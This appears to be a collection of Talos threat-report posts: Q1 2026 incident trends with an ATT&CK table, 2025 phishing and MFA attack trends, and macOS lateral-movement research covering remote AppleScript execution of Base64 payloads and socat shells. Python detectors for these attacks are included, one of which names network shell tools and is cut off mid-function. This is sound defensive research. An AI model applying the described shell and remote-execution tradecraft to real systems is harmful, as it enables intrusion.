In addition to exfiltrating data, the adversary attempted to inject malicious code into multiple GitHub repositories. This code was designed to harvest any new secrets committed in the future, sending them to adversary-controlled infrastructure. Though these attempts were largely thwarted by the expiration of targeted secrets and effective security controls, the tactic reflects an emerging trend of supply chain and development environment attacks.
Pre-ransomware incidents made up just 18 percent of engagements this quarter, and we did not observe any ransomware encryption due to early and swift mitigation from Talos IR. This is a slight increase from last quarter, when ransomware and pre-ransomware collectively comprised 13 percent of engagements, but overall very low compared to Q1 and Q2 2025, when we observed ransomware in 50 percent of engagements. Attribution is challenging in pre-ransomware events because there are no encryptors or ransom notes, but we assess that Rhysida ransomware and MoneyMessage ransomware accounted for two of the engagements.
While we did not observe many active and prolific ransomware-as-a-service (RaaS) operations, like Qilin or Akira, this likely does not indicate these major players are decreasing operations, as their data leak sites remain consistently active.
Rhysida ransomware actors use uncommon backdoor, MeowBackConn
Talos IR responded to a ransomware incident where the adversary attempted to deploy Rhysida ransomware. While the attack was mitigated in the pre-ransomware stage, we attribute this activity with moderate confidence to Rhysida based on observed infrastructure that is associated with Rhysida activity and the use of Gootloader, which is commonly leveraged in Rhysida attacks during initial access. Notably, the actors deployed proxy-related DLLs (e.g., “meow_eu.dll”), which we assess were likely related to MeowBackConn, an uncommon backdoor that is closely associated with Gootloader, based on public reporting.
This attack represents several trends that we observed throughout Talos IR engagements in Q1 2026. The environmental weaknesses that enabled this intrusion — exposed WinRM management ports, over-privileged service accounts, and critical logging gaps — directly echo this quarter’s most prominent security weaknesses, including vulnerable or exposed infrastructure, accounting for 25 percent of engagements. Furthermore, the adversary’s use of Remote Desktop Protocol (RDP) for lateral movement is consistent with RDP being the top technique for lateral movement for the previous two quarters (Q3 and Q4 2025).
Targeting
Public administration and health care were tied as the most targeted industry verticals. Notably, Q3 2025 marked the first time public administration emerged as the most targeted sector in Talos IR engagements, and it has retained that position since. Organizations within the public administration sector are attractive targets as they are often underfunded and use legacy equipment. These entities may have access to sensitive data as well as a low downtime tolerance, making them attractive to financially motivated and espionage-focused threat groups.
Initial access
Phishing reemerged as the most observed means of gaining initial access, accounting for over a third of the engagements where initial access could be determined. Phishing was the top initial access vector in the first half of 2025, at which point it was surpassed by exploitation of public-facing applications, likely due to the widespread exploitation of vulnerabilities in on-premises Microsoft SharePoint servers, collectively referred to as ToolShell. Since then, we have observed a steady decrease in the exploitation of public-facing applications as an initial access vector, from a high of 62 percent to only 18 percent in Q1 2026. Similarly, in this quarter, the use of valid accounts returned to its pre-ToolShell baseline as the second most observed means of gaining initial access, comprising 24 percent of Talos IR engagements. We assess the decline in ToolShell exploitation is likely due to the widespread availability of emergency patches and enhanced security detections, highlighting the importance of timely patching.
Recommendations for addressing top security weaknesses
Implement properly configured MFA and other access control solutions
35 percent of engagements this quarter involved multi-factor authentication (MFA) weaknesses, an increase from last quarter. This includes incidents where threat actors bypassed MFA and where MFA was either missing or only partially enabled, particularly on remote access services. Adversaries were able to bypass MFA by registering new devices to previously compromised accounts, and in one instance, by configuring Outlook clients to connect directly to Exchange servers, circumventing MFA requirements. Addressing these weaknesses, especially by restricting self-service MFA enrollment and enforcing strong, centralized authentication policies, is essential to reducing risk and strengthening organizational resilience.
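The device-registration bypass described above leaves a telemetry footprint: an authenticator is enrolled from an address the account has no established history on, minutes after a sign-in from that same address. The code below is an added example (not Talos IR's detection content, and not tied to any particular identity provider's schema) of the correlation a SIEM rule can express. It assumes two constructed event feeds, successful sign-ins and MFA registrations, uses RFC 5737 documentation addresses, and treats the 24 hours before a registration as untrusted so that the attacker's own fresh sign-in cannot vouch for the new device.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class SignIn:
    ts: datetime
    user: str
    ip: str
    success: bool


@dataclass(frozen=True)
class MfaRegistration:
    ts: datetime
    user: str
    ip: str
    method: str


def _t(value: str) -> datetime:
    return datetime.fromisoformat(value)


# Constructed sample telemetry (RFC 5737 addresses, fictional users).
# alice's credentials were phished: a sign-in from an address she has never
# used is followed minutes later by a new authenticator enrollment. bob
# enrolls a new authenticator from the address he signs in from every week.
SIGN_INS = [
    SignIn(_t("2026-01-05T09:02:00"), "alice", "203.0.113.5", True),
    SignIn(_t("2026-01-12T08:55:00"), "alice", "203.0.113.5", True),
    SignIn(_t("2026-01-19T08:58:00"), "alice", "203.0.113.5", True),
    SignIn(_t("2026-01-21T02:41:00"), "alice", "198.51.100.77", True),
    SignIn(_t("2026-01-06T10:15:00"), "bob", "203.0.113.9", True),
    SignIn(_t("2026-01-20T10:20:00"), "bob", "203.0.113.9", True),
]
REGISTRATIONS = [
    MfaRegistration(_t("2026-01-21T02:49:00"), "alice", "198.51.100.77", "authenticator_app"),
    MfaRegistration(_t("2026-01-20T10:25:00"), "bob", "203.0.113.9", "authenticator_app"),
]


def known_ips(user, sign_ins, before, history, grace):
    """Addresses with a successful sign-in in the window (before - history, before - grace]."""
    start = before - history
    cutoff = before - grace
    return {s.ip for s in sign_ins
            if s.user == user and s.success and start <= s.ts <= cutoff}


def suspicious_registrations(sign_ins, registrations,
                             history=timedelta(days=30), grace=timedelta(hours=24)):
    """MFA registrations from an address the user has no established history on.

    The grace window excludes the sign-ins immediately preceding the
    registration, so a just-completed sign-in from a new address (the
    attacker using stolen credentials) does not count as history.
    """
    flagged = []
    for reg in registrations:
        baseline = known_ips(reg.user, sign_ins, reg.ts, history, grace)
        if reg.ip not in baseline:
            flagged.append(reg)
    return flagged


if __name__ == "__main__":
    for reg in suspicious_registrations(SIGN_INS, REGISTRATIONS):
        print(f"{reg.ts.isoformat()} {reg.user} enrolled {reg.method} from {reg.ip}: no prior history")
```

A brand-new account has no history either, so this rule fires on legitimate first-day enrollments; that is the point at which the recommendation above applies: route self-service enrollment through an approval or help-desk step rather than tuning the detection until it goes quiet.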
Conduct robust patch management
Vulnerable or exposed infrastructure was another top security weakness, accounting for 25 percent of all engagements, a slight decrease from last quarter. This included exploitation of a vulnerability (CVE-2025-20393) in the Spam Quarantine feature of Cisco AsyncOS Software for Cisco Secure Email Gateway and Cisco Secure Email and Web Manager, as well as a vulnerability (CVE-2023-20198) in the web UI feature in Cisco IOS XE Software. Talos also observed exposed management ports (such as WinRM open to the internet), which enabled rapid attacker movement and reconnaissance.
Configure centralized logging capabilities across the environment
Finally, 18 percent of engagements this quarter involved organizations with insufficient logging capabilities, which hindered investigative efforts. Understanding the full context and chain of events performed by an adversary on a targeted host is vital not only for remediation but also for enhancing defenses and addressing any system vulnerabilities for the future. To address this issue, Talos IR recommends organizations implement a security information and event management (SIEM) solution for centralized logging. In the event an adversary deletes or modifies logs on the host, the SIEM will contain the original logs to support a forensic investigation. Additionally, Talos IR offers a Log Architecture Assessment service, which provides a focused review of an organization’s logs and overall log strategy to identify gaps and offer recommendations that give a complete view of the security environment and strengthen incident response readiness.
MITRE ATT&CK appendix
The tables below represent the MITRE ATT&CK techniques observed in this quarter’s IR engagements and include relevant examples and the number of times each was seen. Given that some techniques can fall under multiple tactics, we grouped them under the most relevant tactic based on the way they were leveraged. Please note that this is not an exhaustive list.
Key findings from the MITRE ATT&CK framework include:
Phishing was the top method of initial access, replacing exploitation of public-facing applications which was dominant in the prior two quarters.
Web-based C2 was the most common C2 pattern. Application Layer Protocol over web protocols was observed most often, indicating adversaries frequently blended C2 into normal-looking traffic.
Lateral movement primarily relied on common remote administration channels. SMB/Windows Admin Shares was the top lateral movement technique, with WMI and RDP also heavily used, suggesting attackers repeatedly leveraged standard enterprise remote management paths once inside. RDP was the top technique for lateral movement in the prior two quarters.
Defense evasion frequently focused on weakening visibility and endpoint protections. Impair defenses by disabling/modifying tools appeared multiple times, alongside log/trace reduction behaviors (e.g., clear command history and file deletion), indicating a recurring emphasis on reducing detection and forensic evidence.
Technique | Example | Engagements

Reconnaissance
(technique ID not listed in source) | The adversary enumerated internal processes and identified vendor emails to facilitate their fraudulent ordering scheme. | 1
T1595: Active Scanning | The adversary scanned public-facing websites to understand the target environment. | 2
T1593: Search Open Websites/Domains | The adversary scanned the web to obtain GitHub PATs. | 1

Initial access
T1566: Phishing | The adversary used malicious emails and social engineering to compromise user accounts and facilitate fraudulent purchase orders. | 5
T1189: Drive-by Compromise | The adversary registered several domains that masquerade as being related to VMware and manipulated SEO so that they appear at the top of results when searching for keywords such as "VMware". | 3
T1078: Valid Accounts | The adversary successfully gained access to the environment by using compromised user credentials. | 4
T1190: Exploit Public-Facing Application | Two internet-facing Linux servers running Apache and an LMS application were targeted. | 3

Execution
T1204.002: User Execution: Malicious File | The victim downloaded a malicious installer on their personal host, connected the host to their company’s network, transferred the malware to their primary domain controller, then executed the malware. | 3
T1204.001: User Execution: Malicious Link | The victim clicked on a link that led to a fake DocuSign document hosted on adobe[.]com. | 5
T1059.001: Command and Scripting Interpreter: PowerShell | The adversary used PowerShell commands and scripts for execution. | 4
T1059.006: Command and Scripting Interpreter: Python | The adversary used automated Python scripts to interact with the environment. | 1
T1059.005: Command and Scripting Interpreter: MSHTA | The adversary attempted to use mshta.exe to retrieve and execute a remote malicious payload from an external URL. | (count not listed in source)

Persistence
(technique ID not listed in source) | The adversary registered their own malicious MFA devices to maintain access to compromised accounts. | 2
T1219: Remote Access Software | The adversary installed and used AnyDesk for unauthorized remote access. | 1
T1053.005: Scheduled Task/Job: Scheduled Task | The adversary configured tasks to run on a schedule or at system startup. | 1
T1505: Server Software Component | The adversary installed malware on breached devices to facilitate remote command execution via HTTP. | 1

Privilege escalation
T1068: Exploitation for Privilege Escalation | The adversary escalated to SYSTEM-level privileges, which may have provided access to cached credentials in memory or the registry hives. | 1
T1548: Abuse Elevation Control Mechanism | The adversary used ExecutionPolicy Bypass in PowerShell and attempted to add users to the local Administrators group. | 1
T1078: Valid Accounts | The adversary bypassed standard access controls by using compromised accounts with existing high-level privileges. | 1

Defense evasion
T1070.003: Indicator Removal on Host: Clear Command History | The adversary used the terminal emulator "ConEmu" to run commands, intentionally avoiding log generation. | 2
T1070.001: Indicator Removal: Clear Windows Event Logs | The adversary deleted logs on compromised devices to limit forensic findings. | 1
T1556: Modify Authentication Process | The adversary set up an Outlook client to connect to the Exchange server and was able to send messages via that path, which bypasses the requirement for MFA via Duo. | 1
T1562.001: Impair Defenses: Disable or Modify Tools | The adversary was able to uninstall EDR agents from hosts and attempted to delete Windows Defender policies. | 4

Credential access
T1003.002: OS Credential Dumping: Security Account Manager | The adversary saved the SAM and SYSTEM registry hives to extract local account hashes. | 2
T1003.003: OS Credential Dumping: NTDS | The adversary dumped the ntds.dit file from domain controllers to obtain domain-wide credential hashes. | 1
T1003.005: Cached Domain Credentials | The adversary gained NT hashes for multiple domain accounts from cached logon information. | 1
T1557: Adversary-in-the-Middle | The adversary used an AiTM proxy to capture credentials and session tokens. | 1

Discovery
T1087.003: Account Discovery: Email Account | The adversary used Graph API calls to verify long lists of email addresses and retrieve associated user GUIDs. | 1
T1580: Cloud Infrastructure Discovery | The adversary performed enumeration of the environment, including gathering OneDrive metadata (drive IDs and child item counts) and user roles. | 1
T1069.002: Permission Groups Discovery: Domain Groups | The adversary used commands like net group "domain admins" /domain to find high-privilege accounts. | 1
T1526: Cloud Service Discovery | The adversary ran the legitimate cybersecurity tool TruffleHog to discover repositories containing client secrets and personal information. | (count not listed in source)
(technique ID not listed in source) | The analysis of M365 audit logs showed multiple FileAccessed and FileDownloaded events for documents stored in SharePoint and OneDrive. | 1
T1040: Network Sniffing | The adversary executed monitor capture commands on specific interfaces to intercept and capture network traffic. | 1

Command and control
T1071.001: Application Layer Protocol: Web Protocols | The adversary used MeshAgent to communicate with the C2 server over WebSockets. | 5
T1102: Web Service | The adversary leveraged a Telegram URL to issue instructions and download links. | 1
T1572: Protocol Tunneling | The adversary used a second-stage script to create an HTTPS tunnel directly to the C2 system. | 1
T1201: Traffic Signaling | The adversary communicated with external infrastructure using regular beaconing or other signaling patterns to maintain C2 or check in with their C2 server. | 1

Exfiltration
T1567.002: Exfiltration Over Web Service | The adversary accessed and exfiltrated internal data, specifically SharePoint files, via web-based channels. | 1
T1041: Exfiltration Over C2 Channel | The adversary exfiltrated approximately 2,500 client secrets and personal information. | 2

Impact
T1657: Financial Theft | The adversary used company resources to place orders totaling hundreds of thousands of US dollars for various products, which were successfully delivered. | 1
T1486: Data Encrypted for Impact | The adversary encrypted victim data. | 1
T1531: Account Access Removal | The adversary disabled admin accounts and deleted service accounts in Active Directory (AD) and Azure. | 1

Software
Rhysida | A RaaS, known for posing as a cybersecurity team that “helps” its victims identify security weaknesses in their networks. | Pre-ransomware engagement
SocGholish | A JavaScript-based loader malware that has been used since at least 2017, primarily for initial access. | 1
Money Message | A ransomware that emerged in March 2023 and is capable of targeting Windows and Linux systems (including VMware ESXi servers). | (count not listed in source)
In this episode, we unpack state-sponsored and phishing trends from the 2025 Talos Year in Review. Amy and Martin Lee explore the alarming rise of internal phishing campaigns that bypass traditional perimeter defenses, including the widespread weaponization of Microsoft 365's Direct Send feature. Beyond simple phishing, we analyze the aggressive, blended operations of state-sponsored actors from China and North Korea who are combining high-level zero-day exploits with sophisticated social engineering. From the "Dear Leader" interview test to the reality of fake developer personas, we break down exactly how these adversaries are infiltrating modern organizations.
In 2025, attackers increasingly targeted weaknesses in multi-factor authentication (MFA) workflows, and phishing attacks leveraged valid, compromised credentials to launch lures from trusted accounts. The trends focused entirely on trust, or the lack thereof, in everyday business operations.
Phishing
In 2025, phishing attacks were used for initial access in 40% of incidents, maintaining their prevalence. Attackers ramped up cascaded phishing campaigns, where attackers leveraged the trust of the initial compromised account to create specialized phishing attempts, within the network and out of it, aimed at trusted partners and third parties.
Email composition trends
The content of phishing emails changed somewhat. Transitioning away from spam offers, they took the form of workflow-style emails — IT, travel, and other everyday business tasks that look familiar to employees and executives. Travel and logistics lures in particular surged, while political lures dropped off. Internal expensing and travel emails, even when legitimate, are often repetitive and come from disparate sources with changeable formats or poorly-rendered templates, leading to a lowered guard toward spotting malicious intent. Attackers were likely aiming to steal credentials, payment information, or MFA tokens via fake single sign-on (SSO) pages.
In reviews of thousands of blocked-email keywords, 60% contained subject lines with "request," "invoice," "fwd," "report," and similar. IT-focused phishing keywords turned more technical, to words like "tampering," "domain," "configuration," "token," and others, showing that attackers were making plays toward IT and security workflows.
Attackers also abused Microsoft 365 Direct Send to capitalize on internal email trust. Direct Send is the method by which networked devices like printers and scanners deliver documents to users. The messages appear to be sent and received by the same email address. These internal messages do not receive the same scrutiny that external emails do, from employees or automated email filters. Direct Send allowed attackers to spoof internal email addresses and deliver highly convincing lures from inside the organization, without compromising real accounts, to target key attack services and deliver high-impact damage.
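The header pattern that gives a Direct Send lure away is the combination described above: a sender in the organization's own domain, delivered from an address that is not one of the organization's devices or relays, and failing SPF for that domain. The classifier below is an added example (not Talos's or Microsoft's code) of a mail-flow rule or SIEM parser that separates a genuine scanner notification from a spoofed internal message. The organization domain `example.com`, the trusted source range `203.0.113.0/24`, and the three messages are all constructed; it takes the earliest hop's IP from the last `Received` header and reads the `spf=` verdict from `Authentication-Results`.

```python
import email
import re
from email.message import Message
from email.utils import parseaddr
from ipaddress import ip_address, ip_network

# Assumptions for this example: the organization's own domain and the address
# ranges of its printers, scanners and mail relays (RFC 5737 range, constructed).
ORG_DOMAIN = "example.com"
TRUSTED_SOURCES = [ip_network("203.0.113.0/24")]

IP_IN_RECEIVED = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def origin_ip(msg: Message):
    """IP of the earliest hop, i.e. the last Received header in header order."""
    for hop in reversed(msg.get_all("Received") or []):
        m = IP_IN_RECEIVED.search(hop)
        if m:
            return ip_address(m.group(1))
    return None


def spf_result(msg: Message) -> str:
    m = re.search(r"\bspf=(\w+)", msg.get("Authentication-Results", ""))
    return m.group(1).lower() if m else "none"


def is_internal_looking(msg: Message) -> bool:
    _, sender = parseaddr(msg.get("From", ""))
    return sender.rsplit("@", 1)[-1].lower() == ORG_DOMAIN


def classify(raw: str) -> str:
    """'external', 'internal', or 'spoofed-internal' (internal From, untrusted origin, no SPF pass)."""
    msg = email.message_from_string(raw)
    if not is_internal_looking(msg):
        return "external"
    ip = origin_ip(msg)
    from_trusted_source = ip is not None and any(ip in net for net in TRUSTED_SOURCES)
    if from_trusted_source or spf_result(msg) == "pass":
        return "internal"
    return "spoofed-internal"


# Constructed messages. A real scanner notification from a device on the
# office network; a Direct Send style lure where sender and recipient are the
# same internal address but the connection came from outside; a partner mail.
SCANNER_NOTICE = """\
Received: from printer-3f.example.com (printer-3f.example.com [203.0.113.40]) by mx.example.com
Authentication-Results: mx.example.com; spf=pass smtp.mailfrom=example.com
From: Scanner <scanner@example.com>
To: finance@example.com
Subject: Scanned document

(body omitted)
"""

DIRECT_SEND_LURE = """\
Received: from example.com (unknown [198.51.100.23]) by mx.example.com
Authentication-Results: mx.example.com; spf=fail smtp.mailfrom=example.com; dmarc=fail
From: Finance <finance@example.com>
To: finance@example.com
Subject: Action required: updated expense portal

(body omitted)
"""

PARTNER_INVOICE = """\
Received: from mail.partner.example (mail.partner.example [192.0.2.15]) by mx.example.com
Authentication-Results: mx.example.com; spf=pass smtp.mailfrom=partner.example
From: Billing <billing@partner.example>
To: finance@example.com
Subject: Invoice 4471

(body omitted)
"""

if __name__ == "__main__":
    for name, raw in [("scanner", SCANNER_NOTICE), ("lure", DIRECT_SEND_LURE), ("partner", PARTNER_INVOICE)]:
        print(name, classify(raw))
```

The `spoofed-internal` verdict is where the defenses listed later in the post apply: quarantine or tag the message, and treat the event as a signal to tighten SPF/DMARC and restrict which addresses may use Direct Send.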
MFA and identity attacks
Identity and access management (IAM) applications have grown popular with organizations hoping to consolidate user privileges. Unfortunately, they have also grown in popularity with attackers. Nearly a third of 2025 MFA spray attacks targeted IAM, turning the tools companies used to maintain access control into a point of failure. Device compromise surged by 178%, largely driven by voice phishing designed to trick administrators into registering malicious devices.
MFA spray and device compromise
MFA attack strategy changed by sector. A successful attack could glean SSO tokens and give adversaries the ability to change user roles and credentials, or even the MFA policies themselves. Attackers increasingly exploited authentication workflows to gain and maintain access.
Spray attacks were deployed against networks with predictable identity behavior, while diverse, unmanaged, or high-turnover device ecosystems proved weaker to device compromise attacks.
Notably, higher education was the most targeted device compromise sector. Several factors could contribute to the trend:
· Large, public-facing directories for targeted phishing
Higher education was a very unfavorable target for MFA spray attacks, however. Passwords and MFA are also highly varied and segmented, and most universities have strong login portal policies, enforced lockouts, and login attempt limits.
Guidance for defenders
As always, prioritize based on your own environment.
Organizations should keep in mind that living-off-the-land binaries (LOLBins) and open-source and dual-use tools, which are not inherently malicious, are key to further exploitation. Blocking external IPs from using the Direct Send feature, enabling Microsoft’s newer “Reject Direct Send” control, tightening SPF/DMARC enforcement, and treating “internal-looking” emails with the same scrutiny as inbound mail are currently the most effective defenses.
Likewise, MFA attack protection should be tailored to the style of environment and sector.
MFA spray attacks work well on stable, scaled identity controls. Counter these attacks with strong lockout policies, good password hygiene, and conditional access.
Device compromise works best on variable networks where devices change over fast and MFA use is spotty. Work on establishing better device hardening and management, session controls, and strict phishing-resistant MFA with enrollment governance. Solutions such as Cisco Duo provide controls for phishing-resistant MFA, device trust, and secure enrollment, helping reduce risk from phishing and identity-based attacks.
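An MFA spray looks different from a brute force in the logs: one source, many distinct accounts, one or two attempts each, nearly all stopping at the MFA step, and occasionally one account that gets through because a user approved the prompt. The detector below is an added example (not Talos's detection content) of the sliding-window rule that catches that shape and, just as importantly, reports which accounts succeeded from the spraying source so they can be reset first. The log line format, the addresses and the user names are constructed; a real identity provider exports JSON, and only `parse` would change.

```python
import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta

# Constructed line format for this example. Real identity providers export
# sign-in logs as JSON; the parser is the only part that would change.
LINE = re.compile(r"^(?P<ts>\S+) src=(?P<src>\S+) user=(?P<user>\S+) result=(?P<result>\S+)$")


@dataclass(frozen=True)
class AuthEvent:
    ts: datetime
    src: str
    user: str
    result: str


def parse(lines):
    events = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # skip malformed lines rather than abort the whole batch
        ts = datetime.fromisoformat(m["ts"].replace("Z", "+00:00"))
        events.append(AuthEvent(ts, m["src"], m["user"], m["result"]))
    return events


def spray_sources(events, window=timedelta(minutes=10), min_users=8, min_fail_ratio=0.8):
    """Sources that tried many distinct users inside one window, mostly failing.

    Returns {src: {"users": distinct users in the triggering window,
                   "succeeded": users that completed a login from that source}}.
    """
    by_src = defaultdict(list)
    for e in events:
        by_src[e.src].append(e)
    alerts = {}
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e.ts)
        j = 0
        for i in range(len(evs)):
            # Advance j to the first event outside the window starting at evs[i].
            while j < len(evs) and evs[j].ts - evs[i].ts <= window:
                j += 1
            chunk = evs[i:j]
            users = {e.user for e in chunk}
            failures = sum(1 for e in chunk if e.result != "success")
            if len(users) >= min_users and failures / len(chunk) >= min_fail_ratio:
                alerts[src] = {
                    "users": len(users),
                    "succeeded": sorted({e.user for e in evs if e.result == "success"}),
                }
                break
    return alerts


# Constructed sample log (RFC 5737 addresses, fictional users).
SAMPLE_LOG = [
    # Spray: one source, twelve users, one attempt each, all denied at the MFA step
    f"2026-02-03T03:{14 + i // 4:02d}:{(i % 4) * 15:02d}Z src=198.51.100.9 user=u{i:02d} result=mfa_denied"
    for i in range(12)
] + [
    # ...except u05, whose second attempt was approved by the user
    "2026-02-03T03:16:30Z src=198.51.100.9 user=u05 result=success",
    # Normal noise: one user mistyping a password twice from the office egress address
    "2026-02-03T08:01:00Z src=203.0.113.20 user=carol result=password_failed",
    "2026-02-03T08:01:20Z src=203.0.113.20 user=carol result=password_failed",
    "2026-02-03T08:01:45Z src=203.0.113.20 user=carol result=success",
]

if __name__ == "__main__":
    for src, info in spray_sources(parse(SAMPLE_LOG)).items():
        print(f"{src}: {info['users']} accounts targeted; succeeded: {info['succeeded']}")
```

The `min_users` and window values are the knobs the post's sector guidance is really about: a stable, centrally managed identity estate can run them tight and back them with lockout and conditional access, while a high-turnover estate has to accept more noise and lean on phishing-resistant MFA instead.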
This blog only scratched the surface on 2025 threat trends. See the full Year in Review report for a detailed explanation of Microsoft 365 Direct Send and how it was used for attacks, infographic breakdowns of MFA spray vs. device compromise attacks, the full list of targeted tools and sectors by percentage, and more.
As macOS adoption grows among developers and DevOps, it has become a high value target; however, native "living-off-the-land" (LOTL) techniques for the platform remain significantly under-documented compared to Windows.
Adversaries can bypass security controls by repurposing native features like Remote Application Scripting (RAS) for remote execution and abusing Spotlight metadata (Finder comments) to stage payloads in a way that evades static file analysis.
Attackers can move toolkits and establish persistence using built-in protocols such as SMB, Netcat, Git, TFTP, and SNMP operating entirely outside the visibility of standard SSH-based telemetry.
Defenders should shift from static file scanning to monitoring process lineage, inter-process communication (IPC) anomalies, and enforcing strict MDM policies to disable unnecessary administrative services.
As macOS adoption in the enterprise reaches record highs, with over 45 percent of organizations now utilizing the platform, the traditional "security through obscurity" narrative surrounding the OS has been rendered obsolete. Mac endpoints, once relegated to creative departments, are now the primary workstations for developers, DevOps engineers, and system administrators. Consequently, these machines have become high-value targets that serve as gateways to source code repositories, cloud infrastructure, and sensitive production credentials.
Despite this shift, macOS-native lateral movement and execution tradecraft remain significantly understudied compared to their Windows counterparts. This research was conducted to address this critical knowledge gap. Through a systematic validation of native macOS protocols and system binaries, it is demonstrated how adversaries can “live off the land” (LOTL) by repurposing legitimate administrative tools. By weaponizing native primitives, such as Remote Application Scripting (RAS) and Spotlight metadata, intentional OS security features can be bypassed to transform standard system functions into robust mechanisms for arbitrary code execution and fleet-wide orchestration.
macOS is no longer a niche operating system. According to the Stack Overflow 2024 Developer Survey, a third of professional developers use macOS as their primary platform. These machines represent high-value pivot points, often holding source code repositories, cloud credentials, and SSH keys to production infrastructure.
Despite this trend, the MITRE ATT&CK framework documents far fewer techniques for macOS than for Windows, and recent industry reports indicate that macOS environments prevent significantly fewer attacks than their Windows or Linux counterparts. To address this disparity, community-driven resources such as LOOBins (living-off-the-orchard binaries) have emerged to catalog native macOS binaries that can be repurposed for malicious activity. This research aims to further close that gap by systematically enumerating the native pathways available for both movement and execution.
Establishing a remote shell is the first step in any post-exploitation chain. While SSH is the standard, native macOS features provide several alternatives that can bypass traditional monitoring.
Remote Application Scripting as a Software Deployment Tool (T1072)
Remote Application Scripting (RAS, formerly known as Remote Apple Events or RAE) was introduced to extend the capabilities of the AppleScript Inter-Process Communication (IPC) framework across a network. By utilizing the Electronic Program-to-Program Communication (“eppc”) protocol, administrative tasks and application automation can be performed on remote macOS systems. This mechanism allows a controller machine to send high-level commands to a target machine, which are then processed by the “AppleEventsD” daemon.
The Open Scripting Architecture (OSA) is utilized as the standardized framework for this inter-application communication and automation on macOS. Through the exchange of Apple Events, this architecture enables scripts to programmatically interact with the operating system and installed applications, providing the functional foundation for the “osascript” utility.
Traditionally, RAS is viewed as a lateral movement vector; however, this research demonstrates that it can also be utilized as a standalone Software Deployment Tool for Execution (T1072).
Adversaries attempting to use RAS for complex payloads often encounter Apple’s intentional security features, specifically the -10016 Handler Error. This restriction prevents the “System Events” application from executing remote shell commands via do shell script, even when RAS is globally enabled.
Figure 2. The -10016 Handler Error in remote application scripting.
To bypass this, a methodology was developed that treats “Terminal.app” as an execution proxy. Unlike “System Events”, “Terminal.app” is designed for shell interaction and accepts remote “do script” commands. To ensure payload integrity and bypass AppleScript parsing limitations (such as the -2741 syntax error), Base64 transport encoding is utilized. This transforms multi-line scripts into flat, alphanumeric strings that are decoded and executed in a two-stage process:
Deployment: A single RAS command instructs the remote “Terminal.app” to decode the Base64 string into a temporary path and apply chmod +x.
Invocation: A second RAS command explicitly invokes the script via "bash”, ensuring a proper shell context.
Figure 3. Terminal.app as an execution proxy for Base64 payloads.
Remote Application Scripting for Lateral Movement (T1021.005)
While RAS can be weaponized for execution, its primary function remains the facilitation of inter-process communication (IPC) across a network. In a lateral movement context, RAS is utilized to control remote applications by targeting the “eppc://” URI. This allows for the remote manipulation of the file system or the retrieval of sensitive environmental data without the need for a traditional interactive shell.
For example, the command in Figure 4 can be used to remotely query the Finder for a list of mounted volumes on a target machine, providing an adversary with immediate insight into the victim's network shares and external storage:
Figure 4. Remotely querying mounted volumes via RAE.
Because these actions are performed via Apple Events rather than standard shell commands, they often bypass security telemetry that focuses exclusively on process execution trees, making RAS a discreet and effective vector for lateral movement.
AppleScript execution via SSH
AppleScript is macOS's built-in scripting language for automation. While RAS is a viable application control mechanism, Apple security controls prevent RAS from launching applications; they must already be running. Additionally, RAS must be enabled on the target. To circumvent these obstacles, osascript can be invoked directly over SSH.
Passing osascript the system info command over SSH returns critical environmental details:
Figure 5. Retrieving system information via osascript over SSH.
For arbitrary command execution, AppleScript's do shell script handler can be invoked over SSH. In the following example, do shell script is used to write a file to the target:
Figure 6. Arbitrary file creation using do shell script over SSH.
While SSH alone can accomplish shell tasks, osascript provides access to graphical user interface (GUI) automation and Finder manipulation through Apple Events IPC rather than spawning shell processes. This creates a significant telemetry gap, as most endpoint detection tooling has less visibility into IPC-driven actions than standard shell process trees.
socat remote shell
socat (SOcket CAT) is a command line utility for establishing bidirectional data streams between two endpoints. It supports a wide range of socket types including TCP, UDP, Unix domain sockets, and pseudo terminals (pty).
In a lateral movement context, socat can establish an interactive shell on a target without relying on SSH. The target runs a listener that binds a login shell to a TCP port with pty allocation, and the attacker connects to it from a remote machine.
On the target, the listener spawns an interactive bash session for each incoming connection with pty forwarding:
Figure 7. Establishing a listener with PTY forwarding on the target.
From the attacking machine, connecting to the listener provides a fully interactive terminal:
Figure 8. Attacker connection to the socat listener.
On the target, the reuseaddr,fork options allow multiple connections and reuse of the port, while pty,stderr on the exec gives the connecting client a proper terminal with stderr output. On the sender side, raw,echo=0,icanon=0 puts the local terminal into raw mode so that control characters and signals pass through to the remote shell correctly.
SSH is the de facto mechanism for gaining remote shell access on remote hosts, and as a result, it is where most detection engineering efforts are focused. socat achieves the same outcome, fully interactive terminal access, but operates entirely outside the SSH ecosystem. There are no sshd logs, PAM authentication events, or “authorized_keys” to manage, which means detection pipelines built around SSH telemetry would not catch this activity.
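Both of the execution paths above, Terminal.app decoding a Base64 blob to a temporary path and socat handing a pty-backed shell to a network client, are invisible to SSH telemetry but plain in process lineage, which is the monitoring shift the research recommends. The code below is an added example (not Talos's detection content or any EDR vendor's logic) of two lineage rules run over a constructed process snapshot: a shell whose parent is a socket relay, and a shell descended from Terminal whose command line decodes Base64 into a staging path and marks it executable. Process names, PIDs, the port and the command lines are all constructed fixtures.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    name: str   # executable name as an EDR would record it
    args: str   # full command line


SHELLS = {"bash", "sh", "zsh"}
RELAYS = {"socat", "nc", "ncat"}  # tools that hand a network socket to a shell
B64_DECODE = re.compile(r"base64\s+(?:-D|-d|--decode)\b")
STAGING = re.compile(r"chmod\s+\+x|/tmp/|/var/folders/")


def ancestors(proc, by_pid):
    """Walk ppid links towards launchd; stops on a missing or cyclic parent."""
    chain, seen = [], {proc.pid}
    cur = by_pid.get(proc.ppid)
    while cur is not None and cur.pid not in seen:
        chain.append(cur)
        seen.add(cur.pid)
        cur = by_pid.get(cur.ppid)
    return chain


def detect(procs):
    """Return (pid, rule) pairs for shells with a suspicious lineage."""
    by_pid = {p.pid: p for p in procs}
    alerts = []
    for p in sorted(procs, key=lambda x: x.pid):
        if p.name not in SHELLS:
            continue
        parent = by_pid.get(p.ppid)
        # Rule 1: a shell spawned directly by a socket relay is a bind/reverse shell
        # regardless of what it is doing right now.
        if parent is not None and parent.name in RELAYS:
            alerts.append((p.pid, "socat-shell"))
            continue
        # Rule 2: a shell under Terminal that decodes Base64 into a staging path
        # matches the two-stage RAS deployment described in the text.
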